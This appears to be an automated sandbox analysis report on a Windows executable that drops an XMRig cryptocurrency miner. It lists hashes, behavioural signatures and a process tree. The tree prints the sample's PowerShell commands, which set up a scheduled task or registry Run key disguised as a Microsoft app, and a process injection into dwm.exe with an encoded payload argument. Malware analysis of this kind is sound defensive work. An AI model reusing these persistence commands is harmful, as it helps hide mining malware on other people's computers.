Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
01/02/2023, 13:49
Static task
static1
General
-
Target
69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe
-
Size
3.7MB
-
MD5
96468e68d6ad49dd6f074d22b85619cd
-
SHA1
d84d258d11679b9b4de5b72e247e4de7adc6b316
-
SHA256
69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b
-
SHA512
b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9
-
SSDEEP
98304:lbug78oVoj15ge6TiKLQI5Fle/x6hJvvfRUq4YBYk:Rx78a816vTiKkI5F8QXl
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 4748 created 2616 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 33 PID 4748 created 2616 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 33 PID 964 created 2616 964 runtimes.exe 33 PID 964 created 2616 964 runtimes.exe 33 PID 3860 created 2616 3860 conhost.exe 33 PID 964 created 2616 964 runtimes.exe 33 PID 964 created 2616 964 runtimes.exe 33 -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/1444-148-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp xmrig behavioral1/memory/1444-152-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 964 runtimes.exe -
resource yara_rule behavioral1/memory/1444-148-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp upx behavioral1/memory/1444-152-0x00007FF687CF0000-0x00007FF6884E4000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 964 set thread context of 3860 964 runtimes.exe 91 PID 964 set thread context of 1444 964 runtimes.exe 97 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 4688 powershell.exe 4688 powershell.exe 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 4748 69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe 2160 powershell.exe 2160 powershell.exe 964 runtimes.exe 964 runtimes.exe 2332 powershell.exe 2332 powershell.exe 964 runtimes.exe 964 runtimes.exe 3860 conhost.exe 3860 conhost.exe 964 runtimes.exe 964 runtimes.exe 964 runtimes.exe 964 runtimes.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe 1444 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4688 powershell.exe Token: SeSecurityPrivilege 4688 powershell.exe Token: SeTakeOwnershipPrivilege 4688 powershell.exe Token: SeLoadDriverPrivilege 4688 powershell.exe Token: SeSystemProfilePrivilege 4688 powershell.exe Token: SeSystemtimePrivilege 4688 powershell.exe Token: SeProfSingleProcessPrivilege 4688 powershell.exe Token: SeIncBasePriorityPrivilege 4688 powershell.exe Token: SeCreatePagefilePrivilege 4688 powershell.exe Token: SeBackupPrivilege 4688 powershell.exe Token: SeRestorePrivilege 4688 powershell.exe Token: SeShutdownPrivilege 4688 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeSystemEnvironmentPrivilege 4688 powershell.exe Token: SeRemoteShutdownPrivilege 4688 powershell.exe Token: SeUndockPrivilege 4688 powershell.exe Token: SeManageVolumePrivilege 4688 powershell.exe Token: 33 4688 powershell.exe Token: 34 4688 powershell.exe Token: 35 4688 powershell.exe Token: 36 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4688 powershell.exe Token: SeSecurityPrivilege 4688 powershell.exe Token: SeTakeOwnershipPrivilege 4688 powershell.exe Token: SeLoadDriverPrivilege 4688 powershell.exe Token: SeSystemProfilePrivilege 4688 powershell.exe Token: SeSystemtimePrivilege 4688 powershell.exe Token: SeProfSingleProcessPrivilege 4688 powershell.exe Token: SeIncBasePriorityPrivilege 4688 powershell.exe Token: SeCreatePagefilePrivilege 4688 powershell.exe Token: SeBackupPrivilege 4688 powershell.exe Token: SeRestorePrivilege 4688 powershell.exe Token: SeShutdownPrivilege 4688 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeSystemEnvironmentPrivilege 4688 powershell.exe Token: SeRemoteShutdownPrivilege 4688 powershell.exe Token: SeUndockPrivilege 4688 powershell.exe Token: SeManageVolumePrivilege 4688 powershell.exe Token: 33 4688 powershell.exe Token: 34 4688 powershell.exe Token: 35 4688 powershell.exe Token: 36 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4688 powershell.exe Token: SeSecurityPrivilege 4688 powershell.exe Token: SeTakeOwnershipPrivilege 4688 powershell.exe Token: SeLoadDriverPrivilege 4688 powershell.exe Token: SeSystemProfilePrivilege 4688 powershell.exe Token: SeSystemtimePrivilege 4688 powershell.exe Token: SeProfSingleProcessPrivilege 4688 powershell.exe Token: SeIncBasePriorityPrivilege 4688 powershell.exe Token: SeCreatePagefilePrivilege 4688 powershell.exe Token: SeBackupPrivilege 4688 powershell.exe Token: SeRestorePrivilege 4688 powershell.exe Token: SeShutdownPrivilege 4688 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeSystemEnvironmentPrivilege 4688 powershell.exe Token: SeRemoteShutdownPrivilege 4688 powershell.exe Token: SeUndockPrivilege 4688 powershell.exe Token: SeManageVolumePrivilege 4688 powershell.exe Token: 33 4688 powershell.exe Token: 34 4688 powershell.exe Token: 35 4688 powershell.exe Token: 36 4688 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2160 wrote to memory of 4452 2160 powershell.exe 87 PID 2160 wrote to memory of 4452 2160 powershell.exe 87 PID 964 wrote to memory of 3860 964 runtimes.exe 91 PID 4196 wrote to memory of 4684 4196 cmd.exe 96 PID 4196 wrote to memory of 4684 4196 cmd.exe 96 PID 964 wrote to memory of 1444 964 runtimes.exe 97
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2616
-
C:\Users\Admin\AppData\Local\Temp\69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe"C:\Users\Admin\AppData\Local\Temp\69128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#asbgi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' /tr '''C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" /t REG_SZ /f /d 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwatgy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" } Else { "C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL3⤵PID:4452
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#asbgi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' /tr '''C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft.YourPhone_1.22072.207.0_x64__8wekyb3d8bbweALL" /t REG_SZ /f /d 'C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe lvtxrudcdeiffl2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3860
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:4684
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:4728
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe msgknczdvthndqbs 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUw+V9oqa3SeqtIO6mkmQHVD/ZcrABfHsnFjXW4iNdWOM8EQXEO7XU7P0woczRbsOpO5OLWiBseJZ0Vo/cpj4L9v8ztDjIL21iiKr+6xa1rkuLTnCOFj/EN5A04M2TIYEo3LWhW3qvXTq4ga6bFCoph5bqFOVbTkvtcWwVR443g+V0E4M9spSkHBEmX0cY5XR1j6ajqcejFK+D/95muVyCKP/5JJa/QVeUV//MCMH6e5hc8gTd9CuM8t7ocRTrbn7/idq5w8uN3+OmJ1QZxs3O4cqUjUV2suRX4Y1Zp3d15hnhHZq4M6/8tMEbzlBHhzHU5WhB96nDtYH0m69yLJFEKzp2njjII6ZaA8Oi6k9HCi5RD2b3/PVbkp+tMEtY9N1Mu3PAAh6UteKj6CPd6PC+AFa+J5aqXyZT6I8h0yEwQBbFvcVodZe45tjY4jI/whfHBwU/7GYmirlNGOdYUbOahG4jnPuhLJnTdTg1A1AdXsI+LdeiBA3QmJXlzTHiRY00ZmiKmfBZphSRkwsFjWhT3J/pZ7f9PvaQagjDA/hsay8iJBrWEPk21Hg22UBWj+Lfg1wJ5KZVt4SqmoOpBITJVgLALpXT5/p2AyKn5g2+LRJK/uf7OJ7FLc7nHTsxxSwUA2BdZ2Y/w+4NGYzcfCiM5ZkIRWhzpiDb7eSiBmKZG2FbSOdT8ZN8THc+MKqd49onFp4JJmo49gdX3tnWT0flys+ugSmazO2Ni4hazBsyqY5RH+fvzVtObhhQc67VEy5f3eHPQsNAH9cOx8OTvDsvYMrwMwGbR/9wR0jXOCWhPfvLTMK7A5FsoiXc5EgLSv1H/7moe8qQpzAph1TEDz104ihORRCIXJRI4RXBdIposDZ4DOC9SwuhddBg1Q/Dl42U4lpBLkPx4n4N0Th9MEjSrArHhyQZWKHvcFUGPV0fC96FeEJkAlt6XRIb6Z6TV/mPTfrZZzGaxwmn/AYtnvS9tslsHkgjHWdxe2x4Bprhx9KjedWSPtFGxyngGprPbLOP/xHbNl06ZiJ1dPQ7AUzSQA0bSe34uOMnU0/eNJihDRbNEqZzwCvdncGxFh6a7a8FiOEqTiBriiQ5ecLARTpn20dENmZv3QbCW3KMj87tbcJA1nZbETJb/MTwTTXDdiTd7SWS64kbo8bzMDhJ6dgPtA==2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
C:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exeC:\Users\Admin\OperaSoftware\files\Brave-Browser\runtimes.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:964
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
1KB
MD541a37326e2cdd02bb17b29f080aac616
SHA1fb5d94044489b5cfd2e17c1f307248467a771355
SHA2562599900ed6c98a939a209d6d3d082fb20e01ddeda3f5f56be8f8232030b117c0
SHA5129eeaec370af56bb5ababd85fb3a94a1ee17e345accf3f95093e42f0923179449ee48d8c2ff937907367f46d0c26988c866f00952150be00e64aee0926284daed
-
Filesize
1KB
MD5b6b62fabc50bfae977635bcebb14c566
SHA1653628f0db5229d9136ee897e92bedba3b1d91aa
SHA256bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be
SHA5129bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3.7MB
MD596468e68d6ad49dd6f074d22b85619cd
SHA1d84d258d11679b9b4de5b72e247e4de7adc6b316
SHA25669128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b
SHA512b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9
-
Filesize
3.7MB
MD596468e68d6ad49dd6f074d22b85619cd
SHA1d84d258d11679b9b4de5b72e247e4de7adc6b316
SHA25669128c1b187400128860d246ed9511d9cd4364e6d86e3811da25b309d22bd53b
SHA512b314fd25bd210a20476c5de219c6967dbfa0f8e1b180e70ccc6b3fe103c7d5e308e1ad1441f0b3ebae30703a994546fb36ca4bce6f0173ccf8545b88c24afca9